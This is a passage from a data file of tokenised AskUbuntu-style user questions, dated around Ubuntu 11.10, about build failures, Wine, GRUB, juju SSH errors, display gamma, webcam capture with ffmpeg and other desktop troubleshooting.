toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for ar ... ar checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output from gcc -std=gnu99 object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc -std=gnu99 supports -fno-rtti -fno-exceptions ... no checking for gcc -std=gnu99 option to produce pic ... -fpic -dpic checking if gcc -std=gnu99 pic flag -fpic -dpic works ... yes checking if gcc -std=gnu99 static flag -static works ... yes checking if gcc -std=gnu99 supports -c -o file.o ... yes checking if gcc -std=gnu99 supports -c -o file.o ... ( cached ) yes checking whether the gcc -std=gnu99 linker ( /usr/bin/ld ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... no checking for gen4asm ... no checking for udev ... no checking for x11 ... no checking whether to include sna support ... no checking whether to include uxa support ... yes checking if randr is defined ... no checking if render is defined ... no checking if xf86dri is defined ... no checking if dpmsextension is defined ... no checking for xorg ... no configure : error : package requirements ( xorg-server > = 1.6 xproto fontsproto pixman-1 > = 0.16 ) were not met : no package 'xorg-server ' found no package 'xproto ' found no package 'fontsproto ' found no package 'pixman-1 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables xorg_cflags and xorg_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . - $ make make : *** no targets specified and no makefile found . stop . how should i proceed ?
102670	how to empty my ubuntu-one folder	i want to stop using ubuntu-one . how do i delete whatever is stored in the cloud ?
102671	`` merge '' or `` slipstream '' wine into ubuntu livecd	i must say ubuntu linux is the easiest os i have ever seen . with linux i really am the `` boss '' of my computer . i was thinking : can i put wine in the ubuntu 11.10 desktop iso ? so when i pop in the live cd and install it , wine is automatically there , installed and usable . wine is the first thing i install after my ubuntu setup . this option would make everything so easier for me . thank you all and keep linux alive ! : d
102672	migrating from adobe lightroom to darktable	another fed-up windows user here . only reason i have stuck with it for so long is because i depend on lightroom for photo editing . i want to switch to linux and discovered darktable . question : is there a way to import my existing pictures and the loss-less editing string that goes with each into darktable ? or will all the edits be lost once i important all my photos into darktable ? thanks !
102675	is there a project management software for ubuntu like microsoft project ?	i need a project management software for ubuntu that has most ( if not all ) of the microsoft project features . is something like this available today ?
102684	is the rocket raid 2340 supported ?	i have a server with a rocket raid 2340 card . i know it works in solaris and freebsd , but strangely this old card does n't work in linux . the internet is full of people asking for help , so i decided to add my voice to the party . the company does not have any current drivers , and ubuntu has kernel 3.0 , so am i out of luck here ?
102685	uninstalling itunes in wine	i 've finally managed to install this program only to try and remove itunes because every time i try to start it up , it gives me the message to reinstall it again and error 7 . how do i uninstall itunes ?
102688	ubuntu one and mounted drives	i 'm trying to get my music onto ubuntu one so i can keep it synced , but i 'm having a problem . my music is on my nas ( running on a linux server ) , it 's mounted in my home directory . i can set the directory as synchronised , however none of the files get synced . if i move them into a standard folder on the system they do sync though . is this a problem with ubuntu one or is it a limitation ?
102689	can uninstalling unused shipped software criple future ubuntu upgrades ?	i am new to ubuntu and i would like to uninstall many of the programs i do n't use that came with version 11.10 ( e.g . games , tomboy notes , scan , etc ) . though , i am scared of the thought that by doing so - when i upgrade to a new ubuntu version - my computer might get broken . is there reason to fear ? or is the ubuntu upgrade procedure bullet proof ?
102695	when installing ubuntu 10.04 my screen just goes blank ?	my teacher gave me the disc for 9.04 and 10.04 and each time i try to install i only get to select my language ( english ) and then after i choose full install from the list of option the word ubuntu and the scroll bar showing progress appear . after a couple minutes my monitor went blank so i thought it was doing the install . after many hours passed i still had nothing on the monitor so i hit the computer power button and it ejected the disc , said press any key . when i do this the computer restarts and the only os options i have are for xp . from reading some other questions i feel i may have a problem with my video card . are there any suggestions as to what my next step should be ?
102696	ubuntu 11.10 fresh install wo n't boot	i installed ubuntu on a vm in virtualbox but after the installation ubuntu wo n't boot up at all ! it is stuck at a black screen which is doing nothing . what happened during installation and how do i fix this ? installation took over 3 hours and i do n't want to wait another 3 hours for another installation !
102697	why my gamma settings in my xorg.conf is reseted to 1.0 after some seconds in login screen ?	recently i changed my monitor for a newer one . this new monitor has a darker image than my old one ( for example , videos with dark scenes are now completely black ) . bright and contrast are 100 % in monitor own menu and this are factory default values , monitor menu does not allow gamma adjust . this forced me to look for a solution . bright is not the problem , it is in gamma value . these commands work and image looks a lot better : xgamma -gamma 1.5 xrandr -- output vga1 -- gamma 0.6:0.6:0.6 the problems is that gamma go to 1.0 again when some of these events occur : user logoff , fast user switch , screen turn off after 10 minutes and then at the login prompt you press `` change user '' . the first i tried is to add in each user ( four for this machine ) xgamma in `` startup applications '' , the problem is that whenever you get to lightdm login screen gamma go to 1.0 again . xgamma still says 1.5 when you launch it from terminal without arguments , but screen looks like using gamma 1.0 and you have to execute xgamma -gamma 1.5 again and again . this pc switch users very often , so i really do n't like to have to constantly run xgamma after someone else come and switch from my session to another . in my search for a system wide gamma setting , i finally concluded that creating a xorg.conf file is the only solution . my xorg.conf file looks like this : section `` monitor '' identifier `` monitor0 '' gamma 1.5 endsection section `` screen '' identifier `` vga1 '' monitor `` monitor0 '' endsection that all the content of my xorg.conf file , i put the minimal settings to have the gamma i want and leave xorg to auto configure anything else . it seems to work at first , you can tell that the monitor image is not so dark but if you stay one or two seconds in lightdm login screen gamma go to 1.0 again . i have to login and use xgamma again as only working solution . launch xgamma from xinitrc script wo n't work , at least with the xorg.conf approach i can see lighter colors for a while at system boot , while using xgamma in xinitrc have absolutely no effect in gamma value ( either in /etc/x11/xinit or per user , no matter if i write xgamma or full path to xgamma /usr/bin/xgamma ) . it looks as if some piece of software or maybe an script is resetting my gamma , maybe lightdm itself . or maybe something specific to my hardware ? ubuntu 11.10 amd64 ( up to date , 2012-02-08 ) crt monitor siemens 17 '' mcm 17p1 intel gma x4500 ( onboard graphic card )
102698	juju wo n't run on orchestra due to ssh error	i 've got orchestra installed and running , and i have managed to build my first three nodes . now i want to get down to the business of managing their environments . i 've installed juju on my main orchestra server , and i have generated the keys needed , and i have run the juju bootstrap when i run juju status , i get the following error : can not connect to machine mtmyodcymjk5ms4wmtawndy4ljq1ntcxmg ( perhaps still initializing ) : invalid ssh key 2012-02-08 20:19:21,565 error can not connect to machine mtmyodcymjk5ms4wmtawndy4ljq1ntcxmg ( perhaps still initializing ) : invalid ssh key do i need to copy the public key over to the machines ? there is nothing in authorized_keys for the user that juju is connecting as ... do i need to be logged in as that user on the master server when i run the juju bootstrap command ? i 'm using orchestra to build these machines , and they create an ubuntu user on them , but there is no ubuntu user on the machine that is running orchestra . update : i have created an ubuntu user on the orchestra server since there is an ubuntu user on the nodes that i want to manage . i have also copied the public keys to the nodes themselves . now i get a very different error : ubuntu @ sid : ~ $ juju bootstrap 2012-02-09 09:14:47,931 info bootstrapping environment 'orchestra ' ( type : orchestra ) ... 2012-02-09 09:14:48,043 info juju environment previously bootstrapped . 2012-02-09 09:14:48,045 info 'bootstrap ' command finished successfully ubuntu @ sid : ~ $ juju status 2012-02-09 09:14:52,737 info connecting to environment . 2012-02-09 09:14:53,800 error connection refused unhandled error in deferred : unhandled error traceback ( most recent call last ) : failure : txzookeeper.client.connectiontimeoutexception : could not connect before timeout can not connect to machine mtmyodcymjk5ms4wmtawndy4ljq1ntcxmg ( perhaps still initializing ) : could not connect before timeout after 2 retries 2012-02-09 09:15:22,925 error can not connect to machine mtmyodcymjk5ms4wmtawndy4ljq1ntcxmg ( perhaps still initializing ) : could not connect before timeout after 2 retries here 's another thing i 'd like to learn : how can you un-bootstrap an environment ? in my case , i really think that something is screwed up , and i cant go and do another juju bootstrap because juju says that the environment has already been bootstrapped . can i undo this , and redo the bootstrap process ? here is my environments.yaml file . juju : environments environments : orchestra : type : orchestra # specify the orchestra server orchestra-server : '192.168.* . *' # specify storage . storage-url : 'http : //192.168.* . */webdav' # specify cobbler 's user/pass orchestra-user : cobbler orchestra-pass : ******* admin-secret : ******* # mangement classes acquired-mgmt-class : orchestra-juju-acquired available-mgmt-class : orchestra-juju-available default-series : natty
102699	emacs warning lisp directory does not exist	whenever i start my emacs , i get warning like : warning : lisp directory `/usr/local/share/emacs/23.3/site-lisp ' does not exist . i upgraded to 11.10 from 11.04 . please help me remove this warning .
102700	line in only comes out of front speakers and subwoofer on a 5.1 surround system	my 5.1 surround sound seems to work just fine except anything i plug in to the line in jack of my sound card only comes out of the the front two speakers and the sub woofer . is there a setting in pulseaudio or alsamixer that i 'm missing ?
102710	shader model 3.0 not recognized in wine	i am running the wine ppa ( version 1.4rc2 right now ) and was going to test it with world of warcraft and skyrim . but in the wow video configuration it appears as tho it is not detecting the shader model 3.0 . basically it says there is none . i am running the game with and without the -opengl parameter with no luck . how can i activate the sm3.0 in wine since i am using the proprietary nvidia drivers ( 290.xx ) and have an nvidia gt440 with 1gb ram . additionally today i went to the winecfg and the options for vertex and pixel shading are gone . it only shows the virtual desktop and a couple of other options but no video configurations .
102715	how can i reinstall redmine ?	i have a redmine setup . today morning i saw that my redmine folder was empty and i was unable to access redmine , so i tried installing redmine again using : sudo apt-get install redmine i am getting the following error : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : redmine : depends : ruby-rails-2.3 ( > = 2.3.14 ) but it is not going to be installed or rails ( > = 2.3.14 ) but it is not going to be installed how can i reinstall redmine ?
102721	installaing ruby fails on ubuntu 10.04 server edition	i tried to install ruby on my ubuntu 10.04 server edition sudo apt-get install ruby i get the following error reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ruby : depends : ruby1.8 but it is not going to be installed e : broken packages
102733	how can i increase a partition 's size ?	on my laptop i have ubuntu 11.10 and windows 7 in dual boot mode . i made a partition of 30 gb for ubuntu but now it 's too small and i want to increase this disk size from 32 gb to 100 gb . this is home my disk looks like : c drive - 360 gb d drive - 200 gb e drive - 80 gb on the f drive i installed ubuntu which contains 30 gb . how can i increase this partition from 30 gb to 100 gb ? someone suggested gpart tool to achiveve this . but there is a risk to lose my windows or ubuntu install .
102735	unable to make glib-2.28.0	making all in gmodule make [ 2 ] : entering directory `/home/ubuntu_abhi/desktop/c dependencies/glib-2.28.0/gmodule' make all-am **make [ 3 ] : entering directory `/home/ubuntu_abhi/desktop/c dependencies/glib-2.28.0/gmodule' cc gmodule.lo ccld libgmodule-2.0.la /bin/sed : ca n't read dependencies/glib-2.28.0/glib/libglib-2.0.la : no such file or directory libtool : link : `dependencies/glib-2.28.0/glib/libglib-2.0.la ' is not a valid libtool archive make [ 3 ] : *** [ libgmodule-2.0.la ] error 1 make [ 3 ] : leaving directory `/home/ubuntu_abhi/desktop/c dependencies/glib-2.28.0/gmodule' make [ 2 ] : *** [ all ] error 2 make [ 2 ] : leaving directory `/home/ubuntu_abhi/desktop/c dependencies/glib-2.28.0/gmodule' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/ubuntu_abhi/desktop/c dependencies/glib-2.28.0' make : *** [ all ] error 2**
102738	sound broken in general , possibly a gstreamer issue	within the last few days , when i play any song or internet stream in clementine , it plays the first few seconds , and then goes silent . in banshee , when playing mp3 files , i ca n't use the slider to move around in the song , it is slow to effect changes , resulting in jumping around the song and not representing the position in the song accurately . there are also problems with playing internet streams , though that might be a different issue . if that were n't enough , videos in youtube are slow to start , and it takes a good ten to thirty seconds for the sound and video to sync up . so , either i 'm just having a world of bad luck with a whole bunch of disparate problems . or , i thought , maybe since they are all connected to sound in some way , maybe there is a root problem with my sound set up and all the problems i 'm seeing are symptoms . my suspicion is that this is a gstreamer issue because so far as i can tell vlc has no such problems playing audio streams . ( i wish vlc had an interface that would allow me to edit and sort playlists ... ) is there any way i might diagnose this problem ? or do i just have to live with the fact that sound drivers and audio programs on ubuntu are flakey ?
102742	what 's the easiest way to configure grub in a more user friendly way ?	here is something i 'd like for it to do that it does not do by default , and which seem to require ( somehow ) a bit of research to configure . what i want is simple . select the os that i chose the last time . note : i am running 11.10 now which i believe is grub 2 but i do n't know what version ( 1.99 ? )
102744	ubuntu does not boot after install	i have installed ubuntu form a cd on my laptop and on my desktop pc ( both with windows xp ) . after installation i can choose what system should be booted , windows xp or ubuntu , on my laptop and it works fine , but on the desktop after rebooting , windows xp starts and i have no way to boot ubuntu .
102749	how to activate virtualbox usb devices support ?	using ubuntu 11.10 , downloaded virtual box from software centre plus extension pack . have added my user name to vboxusers group . when trying to add a usb filter virtualbox insists there are no usb devices available . want to access my ipod via itunes on a windows xp guest . how do i get virtualbox to see my usb and allow my guest to use it ?
102750	openbox stops accepting keyboard and mouse input	i 'm using openbox on 11.10 under a gnome/openbox session . every so often , openbox will stop accepting keyboard and mouse input . when this happens , none of my keybindings work , and while i can move the mouse pointer around , clicking does not accomplish anything . when this happens , my only recourse is to switch to a text console ( ctrl-alt-f1 ) and kill openbox . this logs me out , and when i login again , everything is working . i 'm not sure how to even go about troubleshooting this . has anyone else experienced this problem ?
102755	how do i use ffmpeg to take pictures with my web camera ?	i want to use ffmpeg to store images taken by my usb web camera on my ubuntu 11.10. lsusb outputs : bus 002 device 003 : id 0c45:6028 microdia typhoon easycam usb 330k ( older ) the camera works fine using cheese but i want to use command line tools to make it scriptable but if i try : ffmpeg -i /dev/v4l/by-id/usb-0c45_usb_camera-video-index0 image.jpg the output is : user @ box : ~ $ sudo ffmpeg -i /dev/v4l/by-id/usb-0c45_usb_camera-video-index0 image.jpg [ sudo ] password for user : ffmpeg version 0.7.3-4:0.7.3-0ubuntu0.11.10.1 , copyright ( c ) 2000-2011 the libav developers built on jan 4 2012 16:21:50 with gcc 4.6.1 configuration : -- extra-version='4:0.7.3-0ubuntu0.11.10.1 ' -- arch=i386 -- prefix=/usr -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- enable-shared -- disable-static warning : library configuration mismatch avutil configuration : -- extra-version='4:0.7.3-0ubuntu0.11.10.1 ' -- arch=i386 -- prefix=/usr -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay avcodec configuration : -- extra-version='4:0.7.3-0ubuntu0.11.10.1 ' -- arch=i386 -- prefix=/usr -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay avformat configuration : -- extra-version='4:0.7.3-0ubuntu0.11.10.1 ' -- arch=i386 -- prefix=/usr -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay avdevice configuration : -- extra-version='4:0.7.3-0ubuntu0.11.10.1 ' -- arch=i386 -- prefix=/usr -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay avfilter configuration : -- extra-version='4:0.7.3-0ubuntu0.11.10.1 ' -- arch=i386 -- prefix=/usr -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay swscale configuration : -- extra-version='4:0.7.3-0ubuntu0.11.10.1 ' -- arch=i386 -- prefix=/usr -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay postproc configuration : -- extra-version='4:0.7.3-0ubuntu0.11.10.1 ' -- arch=i386 -- prefix=/usr -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavutil 51 . 7 . 0 / 51 . 7 . 0 libavcodec 53 . 6 . 0 / 53 . 6 . 0 libavformat 53 . 3 . 0 / 53 . 3 . 0 libavdevice 53 . 0 . 0 / 53 . 0 . 0 libavfilter 2 . 4 . 0 / 2 . 4 . 0 libswscale 2 . 0 . 0 / 2 . 0 . 0 libpostproc 52 . 0 . 0 / 52 . 0 . 0 /dev/v4l/by-id/usb-0c45_usb_camera-video-index0 : invalid data found when processing input how do i make this work ?
102757	grub overwritten	i 've accidentially overwritten my bootloader . i was prepping some live usb sticks and think i accidentially wrote to my local disk instead of my usb stick . now my machine will only boot in to fedora and only in a live boot environment . i 've downloaded http : //www.supergrubdisk.org/ and installed that to a usb stick and am looking at that , but have never used it before and do n't even know if this will work . can anyone help me get my bootloader back ?
102760	ubuntu-one password and safety	i 'm on 11.10 using auto login . so the `` unlock default keyring '' prompt on startup kept bothering me . i read about the solutions . at `` passwords and keys '' i was only able to delete the ubuntu-one pw , which i thought was responsible for the prompt . i saved it before deleting it . it was the only pw shown there . it was n't the one i had to enter once to access my account though . i did a reboot but the `` unlock ... '' prompt still pops up . but i ca n't put the pw back where it was because the ubuntu one entry is gone . now i ca n't connect to ubuntu-one anymore . it says `` there was a problem while retrieving the credential '' . what can i do about this ? and how can i get rid of the `` unlock ... '' prompt without my system getting unsafe ?
102761	ssh graphical session without graphical environment installed on server	i am quite a noob in network/server stuff and i do n't really know where to begin . i am using ubuntu lucid 10.04 on my pc , and i have also debian ssh server on another machine in my lan . i would like to be able to use a graphical session from ubuntu while accessing debian server . is it possible , and how to do it ? i have n't installed any graphical environment on debian ssh server , because it has no attatched monitor . when it had gnome or xlde installed it freezed while loading the system , with no monitor connected . so now it works only in text mode . i can access it via ssh without any problem , but how do i make a graphical session ? edit : for example i would like to view and manage folders just like in nautilus . thanks in advance , regards
102762	unity is not loading on login	since yesterday i am trying solve this problem . i was working the whole day on my pc and had to reboot it in the evening . since then it came up without unity after login . so i have no panel , no window-decorations . i used to run unity-3d . when i select the 2d equivalent everything works fine . also i can switch to tty1 , export the display location and run unity . this gives the output i attached to the bottom . i do not know where that information is going to while i login from the login-screen . so after that unity is running just fine . i tried to help myself and reinstalled all the unity-packages . also i was thinking if my customized menus would be the problem . i ran alacarte yesterday to change some application descriptions so that i can find the easily using the unity lens . this is what works : run unity manually from tty1 login as guest ( unity starts as usual ) choose unity-2d ( working ) these are the main questions : where does the unity-output go to while login ? how do i reset all its configuration ? how do i reset gnome-menue 's configuration ? thank you ! attached , unit-sdtout and -stderr : stdout checking if settings need to be migrated ... no checking if internal files need to be migrated ... no warn 2012-02-09 10:18:33 glib.glib-gobject < unknown > :0 invalid ( null ) pointer instance screen geometry changed : 0x0x1680x1050 could n't find a perfect decorator match ; trying all decorators starting unity-window-decorator warn 2012-02-09 10:18:35 unity.favorites favoritestoregsettings.cpp:121 unable to load desktop file : /home/simon/.local/share/applications/evolution.desktop warn 2012-02-09 10:18:35 unity.favorites favoritestoregsettings.cpp:121 unable to load desktop file : /home/simon/.local/share/applications/anki.desktop debug 2012-02-09 10:18:36 glib < unknown > :0 setting to primary screen rect : x=0 y=0 w=1680 h=1050 warn 2012-02-09 10:19:33 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method inforequest proxy /com/canonical/unity/lens/music does not exist warn 2012-02-09 10:19:33 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method setactive proxy /com/canonical/unity/lens/music does not exist warn 2012-02-09 10:19:33 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method inforequest proxy /com/canonical/unity/lens/files does not exist warn 2012-02-09 10:19:33 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method setactive proxy /com/canonical/unity/lens/files does not exist warn 2012-02-09 10:19:34 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method inforequest proxy /com/canonical/unity/lens/commands does not exist warn 2012-02-09 10:19:34 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method setactive proxy /com/canonical/unity/lens/commands does not exist warn 2012-02-09 10:19:34 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method inforequest proxy /com/canonical/unity/lens/applications does not exist warn 2012-02-09 10:19:34 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method setactive proxy /com/canonical/unity/lens/applications does not exist warn 2012-02-09 10:19:35 unity.iconloader iconloader.cpp:509 unable to load contents of file : ///usr/share/icons/unity-icon-theme/places/svg/category-installed.svg : fehler beim ăffnen der datei : datei oder verzeichnis nicht gefunden warn 2012-02-09 10:19:35 unity.iconloader iconloader.cpp:509 unable to load contents of file : ///usr/share/icons/unity-icon-theme/places/svg/category-available.svg : fehler beim ăffnen der datei : datei oder verzeichnis nicht gefunden < engl . : '' file not found '' stdout unity-panel-service : kein prozess gefunden < engl . : '' no process found '' backend : gconf integration : true profile : unity adding plugins skipping upgrade com.canonical.unity.unity.01.upgrade skipping upgrade com.canonical.unity.unity.02.upgrade initializing core options ... done initializing bailer options ... done initializing detection options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing mousepoll options ... done initializing vpswitch options ... done initializing animation options ... done initializing snap options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing move options ... done initializing place options ... done initializing grid options ... done initializing gnomecompat options ... done initializing wall options ... done initializing ezoom options ... done initializing workarounds options ... done initializing resize options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing scale options ... done initializing session options ... done unity-panel-service : kein prozess gefunden initializing unityshell options ... done setting update `` main_menu_key '' setting update `` run_key ''
102768	gnome tweak tool editable via bash/python ?	is there a way to access the variables to edit via bash ( or other libraries with bash or python ) ? similar to how you can use 'gconftool-2 ' in bash to edit properties that would update them after edited . for example , i would like to run a script to disable 'the file manager to handle the desktop ' by terminal ( bash or python ) instead of opening this window each time . i also have tried making 'show_desktop ' to false in nautilus in gconf-editor but that does n't do anything . i am using ubuntu 11.10 and compiz as the window manager on gnome ( 2 i believe , or whatever comes with 11.10 ) .
102776	how to kill specific x-window ?	i run some windows games via wine in new x-window on tt8 . here is what i use exec=xinit '/home/deckoff/.playonlinux/wineprefix/homm3/drive_c/program files/gog.com/heroes of might and magic 3 complete/heroes3 ' -- :1 -ac -depth 16 this will invoke script , which reads ! # /bin/bash # sleep 4 xrandr -s 640x480 # xrandr -s 1024x768 /usr/share/playonlinux/playonlinux -- run `` zumasrevenge.exe '' as you can see , i open a new x-windw and change resolution on the go . sometimes , thoug , some of the games will freeze , and the x-window wont die , even if the game is closed . usually , i can kill x with ctr-alt-bkspace , but this will work in tt7 ( default ) only . in tty8the command will not work . so , i want to know , is there a way to restrat or kil the x-window process taking place in tty8
102785	how to make some folders appear on the top in nautilus ?	i 'd like to have some folders on top e.g . on windows i had _videos folder which would always appear on top . how do i achieve the same effect in case of nautilus ? it 's rarely the case i 'd need similar for files but if you know how to do it it also for some files , please drop your hint .
102786	where did this zram swap come from ?	i have a zram swap ( and a normal one ) and i got no idea where it came from : $ sudo blkid | grep zram /dev/zram0 : uuid= '' ... '' type= '' swap '' $ lsmod | grep zram zram 18642 1 $ cat $ cat /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 tmpfs /tmp tmpfs defaults , noatime , mode=1777 0 0 uuid= ... / ext4 discard , noatime , errors=remount-ro 0 1 /dev/disk/by-uuid/ ... /mnt/data ext4 defaults , user , exec , errors=remount-ro 0 2 /dev/disk/by-uuid/ ... /mnt/media ext4 defaults , user , errors=remount-ro 0 2 uuid= ... none swap sw 0 0 where did come from ? how can i get rid of it , besides blacklisting zram ? this is happening only on one of my systems , both running ubuntu 12.04 alpha 2+ .
102790	can not install driver for a wimax modem	i 'm trying to run a program via wine . this is a wimax modem ( qubee bd ) green packet uh-235 . but when i click the qubeewcm.exe i receive the following error message : runtime error ( at-1:0 ) : can not import dll : c\user\apu\temp\is-bcms3.tmp\sskin.dll . with this dialog box a message appear and i click `` ok '' then it does not install anymore . what to do or how can i fix this problem ? - i think the problem is related to the modem driver . - i do n't have any modem driver in the above mention program . - also my wine package is updated and ok , i have just installed winamp.exe from my hard disk . please help me if you have any other way to install my qubee wimax modem shuttle uh-235 ( produced by greenpacket uh-235 ) in ubuntu 11.10 .
102793	wrong characters on windows	i have strange problem using a commercial fem program some pop up window characters are not displayed correctly . i could not find a way to fix this annoying problem . i am using 11.10 and i am guessing that my local x settings are not correct or does not include the correct font family . any ideas .
102797	how to make nautilus ' ftp connections stay live for longer times ?	i use nautilus ftp connections ( i think it 's gvfs ) for all ftp transfers i do and since i do many per day , i 'd like to have them all kept alive , but they disconnect after like a minute . i think some ftp clients can keep connections alive by sending noop every x seconds . can i somehow make nautilus do the same ?
102799	graphic effects are slow	i 'm using a hp pavilion g6 . graphic card is hd6470m and switchable with hd4200 . i have installed the proprietary driver in additional drivers . but graphic effects are very slow . i also tried install up to date driver from ati/amd website but after restart system is not starting . even if system starts do n't work properly . so i removed the driver . now i am using the proprietary driver . when i open catalyst cc i see hd4200 as active gpu . but also i see high performance gpu is active . i take a look on this site and found some answers but do n't work . ( i am using 64bit ubuntu 11.10 ) i 'm new in ubuntu and i will develop software on it . sorry for bad english . thanks ...
102800	virtualbox screen resolution with windows 7	when i install windows 7 32bit in virtualbox on ubuntu 32bit i 've got a problem . the windows 7 install ca n't make its resolution equal my notebook screen resolution of 1280x800 .
102802	why ca n't i see my published software in my ubuntu software center ?	i recently submitted a kakuro game ( called `` sukaro '' ) to the ubuntu software center and it got published about 2 days back . its a commercial app for $ 2.99 . i see the `` published '' status on the ubuntu app developer website ( my apps ) . and i can also see it listed under games -- > puzzles on apps.ubuntu.com ( their online software center ) . but the problem is , i ca n't see it in my software center ( the one on my pc ) . a search or a browse wo n't show it up . i tried doing an update also ( via update manager ) , but still no success . btw , i 'm using ubuntu 11.04 is it the same for everyone or is it just on my computer ? and why is it ? thanks in advance for any help !
102813	inotify not fast enough	im running the following script to monitor the creation of new files , but its not quick enough . if two files get added at the same time , then this script only actions the first one . is there any way to tweak this to run faster or different ? # ! /bin/sh watched_dir=/var/www/magento/media/catalog/product upload_dir=/cloudfiles/magento/media/catalog/product while : do echo 'watching directory : ' $ watched_dir 'for new files' while file= $ ( inotifywait -q -e create -r `` $ watched_dir '' -- format `` % w % f '' ) do loc= $ file rem= $ upload_dir $ { file # $ watched_dir } rsync -- ignore-existing -- inplace -q $ loc $ rem & done done
102814	how to use kinect ( xbox 360 ) as a desktop controller	i have seen other answers for previous ubuntu versions that did not solve my problem . for 11.10 , what software is available to install and operate the kinect controller from the xbox .
102816	how to accelerate opening an application	i want to be able to open an app faster than the normal time it takes to open it . what kind of script of changes do i have to do to make it so that when the app starts to open it receives more priority in cpu and more resources to help open it quicker .
102819	where did my data partition go ?	after installing ubuntu 11.10 and making an additional partition for my documents i find that space reserved for said documents is gone . does not appear anywhere and after several tries all i got in return was the /home folder with the lost+found folder in it saying `` the content of this folder can not be accessed . you do not have the sufficient permissions to view the content '' for anyone that knows what to do , please answer .
